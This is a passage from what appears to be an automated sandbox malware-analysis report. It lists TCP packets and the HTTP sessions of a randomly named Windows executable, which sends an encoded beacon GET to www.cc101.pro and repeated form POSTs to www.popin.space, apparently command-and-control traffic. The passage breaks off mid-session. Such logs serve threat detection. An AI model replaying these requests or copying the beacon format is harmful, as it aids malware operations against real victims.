                                                    Sep 24, 2024 17:18:09.621870041 CEST6370480192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:09.629841089 CEST6370480192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:09.634783030 CEST80637043.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:10.103193045 CEST80637043.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:10.103378057 CEST80637043.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:10.103482008 CEST6370480192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:10.106101036 CEST6370480192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:10.111524105 CEST80637043.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:15.212773085 CEST6370580192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:15.217653990 CEST8063705148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:15.217802048 CEST6370580192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:15.231565952 CEST6370580192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:15.236498117 CEST8063705148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:15.912343979 CEST8063705148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:15.912442923 CEST8063705148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:15.912481070 CEST8063705148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:15.912492990 CEST6370580192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:15.912532091 CEST6370580192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:16.740324020 CEST6370580192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:17.876737118 CEST6370680192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:17.883315086 CEST8063706148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:17.883410931 CEST6370680192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:17.979477882 CEST6370680192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:17.985851049 CEST8063706148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:18.520565033 CEST8063706148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:18.520747900 CEST8063706148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:18.520761967 CEST8063706148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:18.520868063 CEST6370680192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:19.488491058 CEST6370680192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:20.558367014 CEST6370780192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:20.563317060 CEST8063707148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:20.566539049 CEST6370780192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:20.599899054 CEST6370780192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:20.604753971 CEST8063707148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:20.604989052 CEST8063707148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:21.234181881 CEST8063707148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:21.234220028 CEST8063707148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:21.234278917 CEST6370780192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:21.234433889 CEST8063707148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:21.234493017 CEST6370780192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:22.113522053 CEST6370780192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:23.132982016 CEST6370880192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:23.138031960 CEST8063708148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:23.138144970 CEST6370880192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:23.145906925 CEST6370880192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:23.151231050 CEST8063708148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:23.778836966 CEST8063708148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:23.778867006 CEST8063708148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:23.778887033 CEST8063708148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:23.779067039 CEST6370880192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:23.788820028 CEST6370880192.168.2.8148.251.114.233
                                                    Sep 24, 2024 17:18:23.793803930 CEST8063708148.251.114.233192.168.2.8
                                                    Sep 24, 2024 17:18:28.828672886 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:28.833532095 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:28.838455915 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:28.849875927 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:28.854880095 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444363117 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444406033 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444422960 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444457054 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:29.444458961 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444477081 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444495916 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444511890 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:29.444514990 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444540977 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:29.444648981 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444696903 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:29.444825888 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444842100 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.444922924 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:29.449450970 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.449497938 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.449552059 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:29.449786901 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.449923992 CEST8063709209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:29.449981928 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:30.365658045 CEST6370980192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.383472919 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.388472080 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.388564110 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.402606010 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.407571077 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.988761902 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.988818884 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.988858938 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.988898039 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.989037991 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.989074945 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.989103079 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.989106894 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.989154100 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.989190102 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.989206076 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.989228964 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.989262104 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.989305019 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.989370108 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:31.994009972 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.994066000 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.994103909 CEST8063710209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:31.994158983 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:32.915839911 CEST6371080192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:33.929157972 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:33.934078932 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:33.934196949 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:33.945765018 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:33.950567007 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:33.950647116 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589235067 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589314938 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589328051 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589339972 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589396954 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:34.589462042 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:34.589509964 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589523077 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589534044 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589673042 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:34.589705944 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589716911 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589730024 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.589767933 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:34.589929104 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:34.595113039 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.595125914 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.595138073 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.595223904 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:34.595254898 CEST8063711209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:34.596484900 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:35.461015940 CEST6371180192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:36.476417065 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:36.481403112 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:36.481590033 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:36.489972115 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:36.496289968 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074016094 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074037075 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074055910 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074209929 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074222088 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074234009 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074244976 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074244976 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:37.074258089 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074361086 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:37.074361086 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:37.074485064 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074604034 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.074655056 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:37.080769062 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.080782890 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.080796957 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.080873013 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:37.080877066 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:37.081028938 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:37.083599091 CEST6371280192.168.2.8209.74.95.29
                                                    Sep 24, 2024 17:18:37.088798046 CEST8063712209.74.95.29192.168.2.8
                                                    Sep 24, 2024 17:18:42.200279951 CEST6371380192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:42.205714941 CEST8063713199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:42.205807924 CEST6371380192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:42.218084097 CEST6371380192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:42.223215103 CEST8063713199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:42.692819118 CEST8063713199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:42.692847013 CEST8063713199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:42.693073988 CEST6371380192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:42.693212986 CEST8063713199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:42.693284988 CEST6371380192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:43.723036051 CEST6371380192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:44.762319088 CEST6371480192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:44.767307997 CEST8063714199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:44.773422003 CEST6371480192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:44.910325050 CEST6371480192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:44.915529013 CEST8063714199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:45.236882925 CEST8063714199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:45.237076044 CEST8063714199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:45.237093925 CEST8063714199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:45.237157106 CEST6371480192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:45.237157106 CEST6371480192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:46.426322937 CEST6371480192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:47.466142893 CEST6371580192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:47.723176956 CEST8063715199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:47.723272085 CEST6371580192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:47.758857012 CEST6371580192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:47.764138937 CEST8063715199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:47.764204025 CEST8063715199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:48.189950943 CEST8063715199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:48.190100908 CEST8063715199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:48.190114975 CEST8063715199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:48.190185070 CEST6371580192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:48.190185070 CEST6371580192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:49.269980907 CEST6371580192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:50.316798925 CEST6371680192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:50.321728945 CEST8063716199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:50.330368996 CEST6371680192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:50.342324972 CEST6371680192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:50.347193956 CEST8063716199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:50.785259962 CEST8063716199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:50.785631895 CEST8063716199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:50.785646915 CEST8063716199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:50.786084890 CEST6371680192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:50.789288044 CEST6371680192.168.2.8199.59.243.227
                                                    Sep 24, 2024 17:18:50.794145107 CEST8063716199.59.243.227192.168.2.8
                                                    Sep 24, 2024 17:18:55.822375059 CEST6371780192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:55.827465057 CEST80637173.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:55.827562094 CEST6371780192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:55.842067957 CEST6371780192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:55.847047091 CEST80637173.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:56.293693066 CEST80637173.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:56.294239998 CEST6371780192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:57.348012924 CEST6371780192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:57.353053093 CEST80637173.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:58.366831064 CEST6371880192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:58.372030020 CEST80637183.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:58.375291109 CEST6371880192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:58.386401892 CEST6371880192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:58.391633987 CEST80637183.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:58.830848932 CEST80637183.33.130.190192.168.2.8
                                                    Sep 24, 2024 17:18:58.831017017 CEST6371880192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:59.894947052 CEST6371880192.168.2.83.33.130.190
                                                    Sep 24, 2024 17:18:59.900161028 CEST80637183.33.130.190192.168.2.8
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    0 | 192.168.2.8 | 63689 | 188.114.97.3 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:17:18.597160101 CEST | 456 | OUT | GET /ttiz/?L4Ml=5F0OqyJMruXZK289rjd3t7SMD6PUxbvF7XqmY+a1kYOMou9z9S8lHT4vD/FoxHElV5ffXVI3IhvTCCTpyiSb8mZInZ+7lTNJSqYtQImnDDTI4Qo9BSGA+0x0XmeeIzyp/A==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.cc101.pro
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:19.548255920 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Tue, 24 Sep 2024 15:17:19 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Sep 2024 08:27:45 GMT
                                                    Vary: Accept-Encoding
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtL47jKrWB9J9JhQUKpMzP6DA41YqUTPniIXhEhiF8A3XMB%2BuAHkFh8sKwtg6b5bKOm6NuJYxMNRXeHf1ni7%2Fo5Y10Vq8hrnZgRZZsRfxa53rVVOZIFPZ%2Bf61zhQBZEK"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8c83bd99b82dc345-EWR


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.8 | 63690 | 199.59.243.227 | 80 | 6360 | C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 24, 2024 17:17:34.838097095 CEST | 719 | OUT | POST /x7gz/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.popin.space
                                                    Origin: http://www.popin.space
                                                    Referer: http://www.popin.space/x7gz/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:35.277590990 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:34 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1110
                                                    x-request-id: bedfdf1a-fb3e-4a68-8848-6950764afc80
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                    set-cookie: parking_session=bedfdf1a-fb3e-4a68-8848-6950764afc80; expires=Tue, 24 Sep 2024 15:32:35 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:35.277699947 CEST  563  IN
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmVkZmRmMWEtZmIzZS00YTY4LTg4NDgtNjk1MDc2NGFmYzgwIiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    2  192.168.2.8  63691  199.59.243.227  80  6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:17:37.558439970 CEST  739  OUT  POST /x7gz/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.popin.space
                                                    Origin: http://www.popin.space
                                                    Referer: http://www.popin.space/x7gz/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:37.918539047 CEST  1236  IN  HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:37 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1110
                                                    x-request-id: c427e70f-c2ec-49dd-bc3c-dfb8aad91d7c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==
                                                    set-cookie: parking_session=c427e70f-c2ec-49dd-bc3c-dfb8aad91d7c; expires=Tue, 24 Sep 2024 15:32:37 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AnkEeyWtY8ggYVr0LPa4owt2gaa8U62ivbzEY5O1KM9c2/29IW3WPWSOB6BIv6Jtmo9ce6ufw+FPbg//tHlmHw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    Sep 24, 2024 17:17:37.918557882 CEST  563  IN
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzQyN2U3MGYtYzJlYy00OWRkLWJjM2MtZGZiOGFhZDkxZDdjIiwicGFnZV90aW1lIjoxNzI3MTkxMD


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    3  192.168.2.8  63692  199.59.243.227  80  6360  C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Sep 24, 2024 17:17:40.129610062 CEST  1756  OUT  POST /x7gz/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.popin.space
                                                    Origin: http://www.popin.space
                                                    Referer: http://www.popin.space/x7gz/
                                                    Content-Length: 1241
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:17:40.662367105 CEST  1236  IN  HTTP/1.1 200 OK
                                                    date: Tue, 24 Sep 2024 15:17:39 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1110
                                                    x-request-id: d970db4c-46f4-4320-8e90-9392bdbc4515
                                                    cache-control: no-store, max-age=0
